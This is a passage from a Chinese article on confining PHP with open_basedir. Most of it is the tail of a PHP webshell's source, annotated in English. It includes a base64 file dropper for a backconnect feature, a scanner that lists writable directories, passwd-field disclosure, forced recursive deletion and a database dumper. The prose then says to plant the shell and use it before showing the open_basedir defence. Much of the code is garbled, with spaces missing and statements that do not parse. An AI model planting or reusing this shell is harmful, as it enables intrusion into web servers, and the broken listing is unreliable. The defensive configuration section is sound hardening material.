              }
       }
       return$res;
}

 

// Look up a program with the `which` command through execute().
// Returns the command's output, or $pr itself when that output is empty.
// $pr is placed into the command string without shell escaping.
function which($pr) {
       $path= execute("which $pr");
       return($path ? $path : $pr);
}

 

// Write the base64-decoded form of $text to the file $fname.
// The file is opened in mode 'w' (created or truncated). If it cannot be opened the
// function does nothing, and all warnings are suppressed.
// Analyst note: the backconnect branch of this script calls it to place files under /tmp,
// so files appearing there owned by the web server account are the trace to look for.
function cf($fname,$text){
       if($fp=@fopen($fname,'w')){
              @fputs($fp,@base64_decode($text));
              @fclose($fp);
       }
}

 

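/**
 * Return the total size in bytes of all files below the directory $cwd.
 *
 * Fixes over the listed version:
 *  - the read loop compares against false, so an entry literally named "0"
 *    no longer ends the scan early;
 *  - a directory that cannot be opened returns 0 instead of passing a
 *    non-handle to readdir()/closedir().
 *
 * Sub-directories are summed recursively; is_dir() follows symbolic links.
 *
 * @param string $cwd directory path
 * @return int|float total size; 0 when the directory cannot be opened
 */
function dirsize($cwd) {
       $dh = @opendir($cwd);
       if ($dh === false) {
              return 0;
       }
       $size = 0;
       while (($file = readdir($dh)) !== false) {
              if ($file === '.' || $file === '..') {
                     continue;
              }
              $path = $cwd.'/'.$file;
              // "%u" keeps the original's unsigned formatting of filesize() results.
              $size += @is_dir($path) ? dirsize($path) : sprintf("%u", @filesize($path));
       }
       closedir($dh);
       return $size;
}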

 

// 页面调试信息

 

/**
 * Print how long the request has taken so far.
 *
 * Uses the global $starttime (seconds as a float) and prints the elapsed
 * time with six decimal places.
 */
function debuginfo() {
       global $starttime;
       list($fraction, $seconds) = explode(' ', microtime());
       $elapsed = $seconds + $fraction - $starttime;
       echo 'Processed in '.number_format($elapsed, 6).' second(s)';
}

 

 

 

// 清除HTML代码

 

/**
 * Make text safe and readable inside an HTML table cell.
 *
 * The text is HTML-escaped first; then, in this order, newlines become
 * <br />, each pair of spaces becomes two &nbsp; and each tab becomes four.
 */
function html_clean($content) {
       $escaped = htmlspecialchars($content);
       // str_replace() applies array pairs one after another, in the listed order.
       $search = array("\n", "  ", "\t");
       $replace = array("<br />", "&nbsp;&nbsp;", "&nbsp;&nbsp;&nbsp;&nbsp;");
       return str_replace($search, $replace, $escaped);
}

 

 

 

// 获取权限

 

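/**
 * Return the permission bits of $file as a four-digit octal string, e.g. "0644".
 *
 * Fix: the listing had "returnsubstr(", which is a call to an undefined
 * function instead of a return statement; the function now returns its result.
 * When fileperms() fails the result is "0", as in the original expression.
 *
 * @param string $file path to inspect
 * @return string last four octal digits of the file mode
 */
function getChmod($file){
       $mode = @fileperms($file);
       return substr(base_convert($mode, 10, 8), -4);
}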

 

 

 

/**
 * Return the permission string of $f wrapped in a coloured <span>.
 *
 * red   - the path is not readable by the current process
 * black - readable but not writable
 * green - readable and writable
 */
function PermsColor($f) {
       if (!is_readable($f)) {
              $colour = 'red';
       } elseif (!is_writable($f)) {
              $colour = 'black';
       } else {
              $colour = 'green';
       }
       return '<span class="'.$colour.'">'.getPerms($f).'</span>';
}

 

/**
 * Return an `ls -l` style permission string for $file, e.g. "-rw-r--r--".
 *
 * The first character is the file type, followed by read/write/execute flags
 * for owner, group and world; setuid, setgid and sticky bits replace the
 * execute flag with s/S, s/S and t/T. When fileperms() fails the result is
 * "?---------".
 *
 * NOTE(review): the type masks are tested in a fixed order and 0x4000 comes
 * before 0x6000, so a mode whose type bits are 0x6000 is reported as 'd'.
 */
function getPerms($file) {
       $mode = @fileperms($file);

       // Ordered (mask, letter) pairs; the first mask fully contained in $mode decides the type.
       $typeChecks = array(
              array(0xC000, 's'),
              array(0x4000, 'd'),
              array(0xA000, 'l'),
              array(0x8000, '-'),
              array(0x6000, 'b'),
              array(0x2000, 'c'),
              array(0x1000, 'p'),
       );
       $text = '?';
       foreach ($typeChecks as $check) {
              if (($mode & $check[0]) === $check[0]) {
                     $text = $check[1];
                     break;
              }
       }

       // One row per class: read bit, write bit, execute bit, special bit,
       // letter when special+execute, letter when special without execute.
       $classes = array(
              array(00400, 00200, 00100, 0x800, 's', 'S'),
              array(00040, 00020, 00010, 0x400, 's', 'S'),
              array(00004, 00002, 00001, 0x200, 't', 'T'),
       );
       foreach ($classes as $bits) {
              $read = ($mode & $bits[0]) ? 'r' : '-';
              $write = ($mode & $bits[1]) ? 'w' : '-';
              $exec = ($mode & $bits[2]) ? 'x' : '-';
              if ($mode & $bits[3]) {
                     $exec = ($exec == 'x') ? $bits[4] : $bits[5];
              }
              $text .= $read.$write.$exec;
       }
       return $text;
}

 

 

 

/**
 * Build an HTML fragment naming the owner of a path.
 *
 * The owner's uid is resolved with posix_getpwuid(); the visible link text is
 * the account name and the title attribute (tooltip) carries every field of
 * the returned account entry: name, passwd, uid, gid, gecos, dir and shell.
 * None of the fields is HTML-escaped before being placed in the attribute.
 *
 * Review note: this is an information-disclosure helper. It only works when
 * the posix extension is loaded and posix_getpwuid is callable, which is why
 * the function probes for it first.
 *
 * @param string $file Path whose owner is looked up.
 * @return string ' / <a ...>name</a>' on success, '' when posix_getpwuid is
 *                unavailable or the lookup does not return an array.
 */
function getUser($file)   {
       if(function_exists('posix_getpwuid')) {
              // Both calls are silenced with @, so a failed lookup yields no warning.
              $array= @posix_getpwuid(@fileowner($file));
              if($array && is_array($array)) {
                     // &#13&#10 is CR LF, used as a line break inside the tooltip.
                     return' / <a href="#" title="User:'.$array['name'].'&#13&#10Passwd:'.$array['passwd'].'&#13&#10Uid: '.$array['uid'].'&#13&#10gid:'.$array['gid'].'&#13&#10Gecos: '.$array['gecos'].'&#13&#10Dir:'.$array['dir'].'&#13&#10Shell:'.$array['shell'].'">'.$array['name'].'</a>';
              }
       }
       return'';
}

 

 

 

/**
 * Recursively copy a file or directory tree.
 *
 * Paths are formed by plain concatenation ($c.$f and $d.$f), so $c and $d are
 * expected to end with a separator - presumably guaranteed by the caller,
 * which is not visible here.
 *
 * Review note: every path is touched only through PHP filesystem functions
 * (is_dir, mkdir, scandir, copy), i.e. the calls that the open_basedir
 * setting discussed in this article restricts.
 *
 * @param string $c Source base directory.
 * @param string $f Name of the entry inside $c to copy.
 * @param string $d Destination base directory.
 * @return void Results of mkdir() and copy() are not checked or reported.
 */
function copy_paste($c,$f,$d){
       if(is_dir($c.$f)){
              // Create the matching directory on the destination side first.
              mkdir($d.$f);
              $dirs= scandir($c.$f);
              if($dirs) {
                     // Drop the self and parent entries so the recursion terminates.
                     $dirs= array_diff($dirs, array('..', '.'));
                     foreach($dirs as $file) {
                            copy_paste($c.$f.'/',$file,$d.$f.'/');
                     }
              }
       }elseif(is_file($c.$f)) {
              copy($c.$f,$d.$f);
       }
}

 

// 删除目录

 

/**
 * Recursively delete a directory and everything below it.
 *
 * Review note: before each unlink/rmdir the entry is chmod'ed to 0777 with
 * errors suppressed, so read-only files owned by the PHP user are removed
 * too. A burst of chmod-to-0777 followed by deletion under the web root is a
 * useful pattern to look for in file-integrity or audit logs.
 *
 * As printed, the failure branch reads "return0;" - the space after `return`
 * was lost in the listing, so that line is not a return statement.
 *
 * @param string $deldir Directory to remove.
 * @return int 1 if the final rmdir() succeeded, otherwise 0 (intended).
 */
function deltree($deldir) {
       // @ hides the warning when the directory cannot be listed.
       $dirs= @scandir($deldir);
       if($dirs) {
              $dirs= array_diff($dirs, array('..', '.'));
              foreach($dirs as $file) { 
                     if((is_dir($deldir.'/'.$file))){
                            // Sub-directory: loosen its mode, then recurse into it.
                            @chmod($deldir.'/'.$file,0777);
                            deltree($deldir.'/'.$file);
                     }else {
                            // Plain entry: loosen its mode, then delete it.
                            @chmod($deldir.'/'.$file,0777);
                            @unlink($deldir.'/'.$file);
                     }
              }
              @chmod($deldir,0777);
              return@rmdir($deldir) ? 1 : 0;
       }else {
              return0;
       }
}

 

 

 

// 表格行间的背景色替换

 

/**
 * Return the CSS class for the next table row, alternating between
 * 'alt1' and 'alt2'.
 *
 * The row counter lives in the global $bgc and is advanced on every call.
 *
 * @return string 'alt1' when the counter was even before the call, else 'alt2'.
 */
function bg() {
    global $bgc;

    $current = $bgc++;
    if ($current % 2 == 0) {
        return 'alt1';
    }
    return 'alt2';
}

 

 

 

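/**
 * Sort comparator for rows (arrays) keyed by column name.
 *
 * The global $sort selects the ordering: $sort[0] is the column to compare,
 * $sort[1] is truthy for ascending and falsy for descending order.
 *
 * @param array $a First row.
 * @param array $b Second row.
 * @return int Negative, zero or positive, as a sort callback expects.
 */
function cmp($a, $b) {
    global $sort;

    $key = $sort[0];
    $direction = $sort[1] ? 1 : -1;

    if (is_numeric($a[$key])) {
        // Fix: equal values used to be reported as "greater", which makes the
        // comparator inconsistent; report them as equal.
        if ($a[$key] == $b[$key]) {
            return 0;
        }
        return (($a[$key] < $b[$key]) ? -1 : 1) * $direction;
    }

    // Fix: the listing read "returnstrcmp(...)", which PHP parses as a call to
    // an undefined function instead of returning strcmp()'s result.
    return strcmp($a[$key], $b[$key]) * $direction;
}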

 

 

 

// 获取当前目录的上级目录

 

/**
 * Return the parent directory of a '/'-separated path, with a trailing slash.
 *
 * The path is split on '/'; when it has more than two segments the last two
 * are dropped (for a path ending in '/', those are the final directory name
 * and the empty segment after the slash). Doubled slashes in the result are
 * collapsed once.
 *
 * @param string $cwd Current directory.
 * @return string Parent directory ending in '/'.
 */
function getUpPath($cwd) {
    $segments = explode('/', $cwd);

    if (count($segments) > 2) {
        $segments = array_slice($segments, 0, -2);
    }

    return str_replace('//', '/', implode('/', $segments).'/');
}

 

 

 

// 检查PHP配置参数

 

/**
 * Read a PHP configuration value and present it in readable form.
 *
 * The value from get_cfg_var() is compared loosely (==): anything equal to 0
 * becomes 'No', anything equal to 1 becomes 'Yes', everything else is
 * returned unchanged. Because the comparison is loose, a missing directive
 * (false) is reported as 'No'.
 *
 * @param string $varname Name of the configuration directive.
 * @return mixed 'No', 'Yes', or the raw configuration value.
 */
function getcfg($varname) {
    $value = get_cfg_var($varname);

    if ($value == 0) {
        return 'No';
    }
    if ($value == 1) {
        return 'Yes';
    }
    return $value;
}

 

 

 

// 获得文件扩展名

 

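/**
 * Return the extension of a file name, without the leading dot.
 *
 * @param string $file File name or path.
 * @return string The extension, or '' when the name has none.
 */
function getext($file) {
    // Fix: indexing pathinfo()'s array with 'extension' raises an
    // undefined-index notice for names without a dot; asking for the single
    // component returns '' in that case instead.
    return pathinfo($file, PATHINFO_EXTENSION);
}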

 

/**
 * Recursively collect every writable directory below $path.
 *
 * Results accumulate in the global $dirdata, indexed by the global counter
 * $j (started at 1); $web_cwd is stripped from each path to build the
 * displayed name. Each record holds filename, mtime, chmod, perm, owner and
 * link, filled in by getChmod(), PermsColor() and getUser().
 *
 * Review note: this is a reconnaissance helper - it walks the whole tree and
 * reports where the PHP process may write. With open_basedir in effect,
 * scandir() fails for directories outside the allowed list and the function
 * takes the empty-result branch for them. There is no visible guard against
 * revisiting a directory, so looping symlinks may recurse deeply (is_dir()
 * follows symlinks).
 *
 * As printed, the fallback reads "returnarray();" - the space after `return`
 * was lost in the listing, so that line is a call to an undefined function.
 *
 * @param string $path Directory to start from.
 * @return array The accumulated $dirdata, or an empty array when $path
 *               cannot be listed (intended).
 */
function GetWDirList($path){
       global$dirdata,$j,$web_cwd;
       // Start the record counter at 1 on first use.
       !$j&& $j=1;
       $dirs= @scandir($path);
       if($dirs) {
              $dirs= array_diff($dirs, array('..','.'));
              foreach($dirs as $file) {
                     // Join and collapse a doubled slash when $path already ends in '/'.
                     $f=str_replace('//','/',$path.'/'.$file);
                     if(is_dir($f)){
                            // Only writable directories are recorded ...
                            if(is_writable($f)) {
                                   $dirdata[$j]['filename']='/'.str_replace($web_cwd,'',$f);
                                   // NOTE(review): the format has no space between date and time - possibly lost in the listing.
                                   $dirdata[$j]['mtime']=@date('Y-m-dH:i:s',filemtime($f));
                                   $dirdata[$j]['chmod']=getChmod($f);
                                   $dirdata[$j]['perm']=PermsColor($f);
                                   $dirdata[$j]['owner']=getUser($f);
                                   $dirdata[$j]['link']=$f;
                                   $j++;
                            }
                            // ... but every directory is descended into, writable or not.
                            GetWDirList($f);
                     }
              }
              return$dirdata;
       }else {
              returnarray();
       }
}

 

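/**
 * Format a byte count with a binary unit, e.g. 1536 -> "1.5 KB".
 *
 * The value is divided by 1024 until it drops below 1024 or the largest
 * unit (PB) is reached, then rounded to two decimals.
 *
 * @param int|float $size Size in bytes.
 * @return string Rounded value, a space, and the unit name.
 */
function sizecount($size) {
    $unit = array('Bytes', 'KB', 'MB', 'GB', 'TB', 'PB');

    for ($i = 0; $size >= 1024 && $i < 5; $i++) {
        $size /= 1024;
    }

    // Fix: the listing read "returnround(...)", which PHP parses as a call to
    // an undefined function instead of returning the formatted string.
    return round($size, 2).' '.$unit[$i];
}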

 

/**
 * Print a string followed by a newline.
 *
 * @param string $str Text to write to the output.
 * @return void
 */
function p($str){
    echo "{$str}\n";
}

 

 

 

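/**
 * Print a hidden <input> whose id and name are both $name.
 *
 * $name and $value are inserted into the markup as given, without HTML
 * escaping, so callers must pass values that are safe inside an attribute.
 *
 * @param string $name  Field name (also used as id).
 * @param string $value Field value.
 * @return void
 */
function makehide($name,$value=''){
    // Fix: the listing had lost the spaces between the tag name and its
    // attributes ("<inputid=", "\"value="), producing invalid markup.
    p("<input id=\"$name\" type=\"hidden\" name=\"$name\" value=\"$value\" />");
}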

 

 

 

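/**
 * Print an <input> element described by an option array.
 *
 * Recognised keys: size (default 100), type (default 'text'), title
 * (printed before the field, followed by <br />), class (default 'input'),
 * name (also used as id), value, and newline (when set, the field is
 * wrapped in <p>...</p>). Values are inserted without HTML escaping.
 *
 * @param array $arg Options as described above.
 * @return void
 */
function makeinput($arg = array()){
    $arg['size']  = isset($arg['size']) && $arg['size'] > 0 ? "size=\"$arg[size]\"" : "size=\"100\"";
    $arg['type']  = isset($arg['type']) ? $arg['type'] : 'text';
    $arg['title'] = isset($arg['title']) ? $arg['title'].'<br />' : '';
    $arg['class'] = isset($arg['class']) ? $arg['class'] : 'input';
    $arg['name']  = isset($arg['name']) ? $arg['name'] : '';
    $arg['value'] = isset($arg['value']) ? $arg['value'] : '';

    $wrap = isset($arg['newline']);

    if ($wrap) {
        p('<p>');
    }
    // Fix: the listing had lost the spaces separating the tag name and several
    // attributes ("<inputclass=", "\"id=", "\"type="), producing invalid markup.
    p("$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] />");
    if ($wrap) {
        p('</p>');
    }
}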

 

 

 

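/**
 * Print a <select> element described by an option array.
 *
 * Recognised keys: title (printed before the element), name (also used as
 * id), onchange (inline handler), option (array of value => label) and
 * selected (the value to pre-select, compared loosely with each key).
 * Values are inserted without HTML escaping.
 *
 * @param array $arg Options as described above.
 * @return void
 */
function makeselect($arg = array()){
    // Fix: the listing assigned to a variable and wrote an attribute whose
    // first letter was the Greek omicron, then read the Latin-spelled
    // $onchange, which was therefore always undefined.
    $onchange = isset($arg['onchange']) ? 'onchange="'.$arg['onchange'].'"' : '';
    $arg['title'] = isset($arg['title']) ? $arg['title'] : '';
    $arg['name']  = isset($arg['name']) ? $arg['name'] : '';
    // Read the optional keys once so a missing key raises no notice; null
    // keeps the original loose-comparison outcome for an absent 'selected'.
    $selected = isset($arg['selected']) ? $arg['selected'] : null;

    // Fix: spaces between attributes restored ("\"name=", "<optionvalue=").
    p("$arg[title]<select class=\"input\" id=\"$arg[name]\" name=\"$arg[name]\" $onchange>");
    if (isset($arg['option']) && is_array($arg['option'])) {
        foreach ($arg['option'] as $key => $value) {
            if ($selected == $key) {
                p("<option value=\"$key\" selected>$value</option>");
            } else {
                p("<option value=\"$key\">$value</option>");
            }
        }
    }
    p("</select>");
}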

 

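/**
 * Print an opening <form> tag that posts back to the current script (SELF),
 * optionally followed by an <h2> title.
 *
 * Recognised keys: method (default 'post'), name (default 'form1', also used
 * as id), extra (raw attribute text), onsubmit (inline handler) and title.
 * Values are inserted without HTML escaping.
 *
 * @param array $arg Options as described above.
 * @return void
 */
function formhead($arg = array()) {
    if (!isset($arg['method'])) {
        $arg['method'] = 'post';
    }
    if (!isset($arg['name'])) {
        $arg['name'] = 'form1';
    }
    $arg['extra'] = isset($arg['extra']) ? $arg['extra'] : '';
    // Fix: the attribute name in the listing began with the Greek omicron
    // instead of the Latin "o", so browsers would not treat it as onsubmit.
    $arg['onsubmit'] = isset($arg['onsubmit']) ? "onsubmit=\"$arg[onsubmit]\"" : '';

    // Fix: spaces between the tag name and attributes restored
    // ("<formname=", "\"action=", "\"$arg[onsubmit]").
    p("<form name=\"$arg[name]\" id=\"$arg[name]\" action=\"".SELF."\" method=\"$arg[method]\" $arg[onsubmit] $arg[extra]>");

    if (isset($arg['title'])) {
        p('<h2>'.$arg['title'].'»</h2>');
    }
}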

 

      

 

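/**
 * Print a 100x25 <textarea> wrapped in a paragraph.
 *
 * Recognised keys: title (printed before the field, followed by <br />),
 * name (also used as id) and value (initial content). Values are inserted
 * without HTML escaping.
 *
 * @param array $arg Options as described above.
 * @return void
 */
function maketext($arg = array()){
    $arg['title'] = isset($arg['title']) ? $arg['title'].'<br />' : '';
    $arg['name']  = isset($arg['name']) ? $arg['name'] : '';
    // Fix: 'value' was read without a default, raising a notice when absent.
    $arg['value'] = isset($arg['value']) ? $arg['value'] : '';

    // Fix: spaces between the tag name and attributes restored
    // ("<textareaclass=", "\"name=", "\"rows=").
    p("<p>$arg[title]<textarea class=\"area\" id=\"$arg[name]\" name=\"$arg[name]\" cols=\"100\" rows=\"25\">$arg[value]</textarea></p>");
}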

 

 

 

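/**
 * Print a submit button and close the current <form>.
 *
 * @param string $name Name and id of the button; 'submit' when empty.
 * @return void
 */
function formfooter($name = ''){
    if (!$name) {
        $name = 'submit';
    }
    // Fix: spaces between the tag name and attributes restored
    // ("<inputclass=", "\"type=").
    p('<p><input class="bt" name="'.$name.'" id="'.$name.'" type="submit" value="提交"></p>');
    p('</form>');
}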

 

 

 

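/**
 * Print a small form with a single button that posts back to the file view
 * (act=file) for the current directory and charset.
 *
 * The globals $cwd and $charset are written into hidden fields without HTML
 * escaping.
 *
 * @return void
 */
function goback(){
    global $cwd, $charset;

    // Fix: spaces between tag names and attributes restored ("<formaction=",
    // "<inputtype=", "\"value=", "\"name=", "<inputclass=").
    p('<form action="'.SELF.'" method="post"><input type="hidden" name="act" value="file" /><input type="hidden" name="cwd" value="'.$cwd.'" /><input type="hidden" name="charset" value="'.$charset.'" /><p><input class="bt" type="submit" value="返回"></p></form>');
}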

 

 

 

/**
 * Close the current <form> without printing a submit button.
 *
 * @return void
 */
function formfoot(){
    $closingTag = '</form>';
    p($closingTag);
}

 

 

 

/**
 * Hash a password for comparison with the configured value.
 *
 * The hash is a single unsalted MD5, which is why common passwords can be
 * recovered from the stored digest by lookup alone. For real credential
 * storage PHP provides password_hash() / password_verify().
 *
 * @param string $pass Clear-text password.
 * @return string 32-character lowercase hexadecimal MD5 digest.
 */
function encode_pass($pass) {
    return md5($pass);
}

 

 

 

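/**
 * Debug helper: print a value with print_r() inside a bordered <pre> block.
 *
 * @param mixed $a Value to display.
 * @return void
 */
function pr($a) {
    // Fix: print_r() without its second argument prints immediately and
    // returns true, so the dump appeared before the box and the box contained
    // "1". Passing true returns the text so it lands inside <pre>.
    // Also restores the spaces lost in the listing ("<divstyle=", "solid#ddd").
    p('<div style="text-align: left;border:1px solid #ddd;"><pre>'.print_r($a, true).'</pre></div>');
}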

 

 

 

/**
 * Thin wrapper around the legacy mysql_* extension.
 *
 * Review notes:
 *  - Every database call goes through mysql_* functions; that extension was
 *    removed in PHP 7.0, so this class only runs on older interpreters.
 *  - As printed, the listing has lost the space after `function` in every
 *    method declaration and after `return` in several places
 *    ("functionconnect", "returnmysql_select_db", ...), so it does not parse
 *    as shown.
 *  - sqldump() places $table into SQL text unquoted and unescaped.
 */
class DB_MySQL  {
       // Number of statements sent through query() / query_res().
       var$querycount = 0;
       // Connection handle returned by mysql_connect().
       var$link;
       // Map from HTTP charset name to MySQL charset name; filled by the caller.
       var$charsetdb = array();
       // Charset selected for the session (a key of $charsetdb).
       var$charset = '';

       /**
        * Open a connection and optionally select a database.
        * Calls halt() - which exits - when the connection fails.
        */
       functionconnect($dbhost, $dbuser, $dbpass, $dbname='') {
              @ini_set('mysql.connect_timeout',5);
              // Fourth argument 1 = new_link: always open a separate connection.
              if(!$this->link= @mysql_connect($dbhost, $dbuser, $dbpass, 1)) {
                     $this->halt('Cannot connect to MySQL server');
              }
              // String comparison against the server version text.
              if($this->version()> '4.1') {
                     $this->setcharset($this->charset);
              }
              $dbname&& mysql_select_db($dbname, $this->link);
       }

       /**
        * Set the connection charset, if $charset is a known key of $charsetdb.
        * Falls back to a SET statement when mysql_set_charset() is unavailable.
        */
       functionsetcharset($charset) {
              if($charset && $this->charsetdb[$charset]) {
                     if(function_exists('mysql_set_charset')){
                            mysql_set_charset($this->charsetdb[$charset],$this->link);
                     }else {
                            $this->query("SETcharacter_set_connection='".$this->charsetdb[$charset]."',character_set_results='".$this->charsetdb[$charset]."',character_set_client=binary");
                     }
              }
       }

       /** Select the active database on the current link. */
       functionselect_db($dbname) {
              returnmysql_select_db($dbname, $this->link);
       }

       /** Text of the last MySQL error (for this link when one exists). */
       functiongeterrdesc() {
              return(($this->link) ? mysql_error($this->link) : mysql_error());
       }

       /** Numeric code of the last MySQL error, as an int. */
       functiongeterrno() {
              returnintval(($this->link) ? mysql_errno($this->link) : mysql_errno());
       }

       /** Fetch the next row of a result; associative by default. */
       functionfetch($query, $result_type = MYSQL_ASSOC) { //MYSQL_NUM
              returnmysql_fetch_array($query, $result_type);
       }

       /**
        * Run a statement and return its result handle.
        * On failure halt() prints the error and exits.
        */
       functionquery($sql) {
              //echo'<p style="color:#f00;">'.$sql.'</p>';
              if(!($query= mysql_query($sql, $this->link))) {
                     // halt() declares a single parameter, so $sql is ignored here.
                     $this->halt('MySQLQuery Error', $sql);
              }
              $this->querycount++;
              return$query;
       }

       /**
        * Run a statement without halting on error.
        * Returns 0 on failure, 1 when a result resource came back,
        * 2 for any other successful outcome.
        */
       functionquery_res($sql) {
              $res= '';
              if(!$res= mysql_query($sql, $this->link)) {
                     $res= 0;
              }else if(is_resource($res)) {
                     $res= 1;
              }else {
                     $res= 2;
              }
              $this->querycount++;
              return$res;
       }

       /** Number of rows in a result. */
       functionnum_rows($query) {
              $query= mysql_num_rows($query);
              return$query;
       }

       /** Number of columns in a result. */
       functionnum_fields($query) {
              $query= mysql_num_fields($query);
              return$query;
       }

       /** Rows affected by the last statement on this link. */
       functionaffected_rows() {
              returnmysql_affected_rows($this->link);
       }

       /** Value of the first column of row $row in a result. */
       functionresult($query, $row) {
              $query= mysql_result($query, $row);
              return$query;
       }     

       /** Release the memory held by a result. */
       functionfree_result($query) {
              $query= mysql_free_result($query);
              return$query;
       }

       /** Server version string. */
       functionversion() {
              returnmysql_get_server_info($this->link);
       }

       /** Close the connection. */
       functionclose() {
              returnmysql_close($this->link);
       }

       /**
        * Print an error page fragment (message, MySQL error text and number,
        * the first two HTML-escaped) and terminate the script.
        */
       functionhalt($msg =''){
              echo"<h2>".htmlspecialchars($msg)."</h2>\n";
              echo"<p class=\"b\">Mysql error description:".htmlspecialchars($this->geterrdesc())."</p>\n";
              echo"<p class=\"b\">Mysql error number:".$this->geterrno()."</p>\n";
              exit;
       }

       /** Collect the column metadata objects for every field of a result. */
       functionget_fields_meta($result) {
              $fields= array();
              $num_fields= $this->num_fields($result);
              for($i = 0; $i < $num_fields; $i++) {
                     $field= mysql_fetch_field($result, $i);
                     $fields[]= $field;
              }
              return$fields;
       }

       /**
        * Hand-rolled escaping for dump output: doubles backslashes and single
        * quotes. Within this class it is used only when writing dumped values.
        */
       functionsqlAddSlashes($s = ''){
              $s= str_replace('\\', '\\\\', $s);
              $s= str_replace('\'', '\'\'', $s);
              return$s;
       }

       // Back up (dump) a table
       /**
        * Write a SQL dump of one table: session preamble, DROP TABLE, the
        * CREATE TABLE statement reported by the server, then one INSERT per row.
        * Output goes to the stream $fp when given, otherwise to the response.
        *
        * Review note: $table is interpolated into "SHOW CREATE TABLE" and
        * "SELECT * FROM" without quoting or escaping.
        */
       functionsqldump($table, $fp=0) {
              $crlf= (IS_WIN ? "\r\n" : "\n");
              // Control characters that are rewritten as escape sequences in string values.
              $search= array("\x00", "\x0a", "\x0d","\x1a"); //\x08\\x09, not required
              $replace= array('\0', '\n', '\r', '\Z');

              // Use the configured charset when known, otherwise the 'utf-8' entry.
              if(isset($this->charset) &&isset($this->charsetdb[$this->charset])) {
                     $set_names= $this->charsetdb[$this->charset];
              }else {
                     $set_names= $this->charsetdb['utf-8'];
              }
              $tabledump= 'SET SQL_MODE="NO_AUTO_VALUE_ON_ZERO";'.$crlf.$crlf;
              $tabledump.= '/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;'.$crlf
                        . '/*!40101 SET@OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;'.$crlf
                        . '/*!40101 SET@OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;'.$crlf
                        . '/*!40101 SET NAMES ' . $set_names . '*/;'.$crlf.$crlf;

              $tabledump.= "DROP TABLE IF EXISTS `$table`;".$crlf;
              $res= $this->query("SHOW CREATE TABLE $table");
              $create= $this->fetch($res, MYSQL_NUM);
              // Column 1 of the row holds the CREATE TABLE statement.
              $tabledump.= $create[1].';'.$crlf.$crlf;
              // Normalise whatever line ending the server used to $crlf.
              if(strpos($tabledump, "(\r\n ")) {
                     $tabledump= str_replace("\r\n", $crlf, $tabledump);
              }elseif (strpos($tabledump, "(\n ")) {
                     $tabledump= str_replace("\n", $crlf, $tabledump);
              }elseif (strpos($tabledump, "(\r ")) {
                     $tabledump= str_replace("\r", $crlf, $tabledump);
              }
              unset($create);

              // Emit the schema part before streaming the rows.
              if($fp) {
                     fwrite($fp,$tabledump);
              }else {
                     echo$tabledump;
              }
              $tabledump= '';
              $rows= $this->query("SELECT * FROM $table");
              $fields_cnt= $this->num_fields($rows);
              $fields_meta= $this->get_fields_meta($rows);

              while($row = $this->fetch($rows, MYSQL_NUM)) {
                     // $values is built fresh per row (it is unset after each INSERT).
                     for($j = 0; $j < $fields_cnt; $j++) {
                            if(!isset($row[$j]) || is_null($row[$j])) {
                                   $values[]= 'NULL';
                            }elseif ($fields_meta[$j]->numeric && $fields_meta[$j]->type !='timestamp' && !$fields_meta[$j]->blob) {
                                   // Numeric columns are written unquoted.
                                   $values[]= $row[$j];
                            }elseif ($fields_meta[$j]->blob) {
                                   // Blob columns are written as hex literals, or '' when empty.
                                   if(empty($row[$j]) && $row[$j] != '0') {
                                          $values[]= '\'\'';
                                   }else {
                                          $values[]= '0x'.bin2hex($row[$j]);
                                   }
                            }else {
                                   // Everything else is a quoted, escaped string.
                                   $values[]= '\''.str_replace($search, $replace, $this->sqlAddSlashes($row[$j])).'\'';
                            }
                     }
                     $tabledump= 'INSERT INTO `'.$table.'` VALUES('.implode(', ', $values).');'.$crlf;
                     unset($values);
                     if($fp) {
                            fwrite($fp,$tabledump);
                     }else {
                            echo$tabledump;
                     }
              }
              $this->free_result($rows);
       }
}

 

?>

 

将上面的PHP文件挂到web目录下面,输入密码(密码已经写在该PHP文件开头的"程序配置"部分),就可以进入到web目录下面去了。

如此发现可以进行跨站的操作了。

如果我们想禁止这些操作,将用户的操作目录限制在某个目录下面,可以在PHP的配置文件(php.ini)中按站点设置open_basedir来实现(其中的 [HOST=]、[PATH=] 分段只在CGI/FastCGI方式下生效):

[HOST=www.abc.com]

; /var/lib/php/session 是php的session目录
open_basedir=/path/for/web:/var/lib/php/session:/tmp

[PATH=/path/for/web]

open_basedir=/path/for/web:/var/lib/php/session:/tmp

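限制的目录可以是多个,多个目录之间用冒号分隔(Windows下用分号),之后重启PHP就可以了。重新访问挂的木马文件,发现此时不能再向上级目录进行访问了,也就是我们的操作被锁定在了open_basedir指定的目录下面了。需要注意,open_basedir只约束PHP自身的文件操作函数,对通过exec、system等启动的外部程序不起作用,所以通常还要配合disable_functions一起使用。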
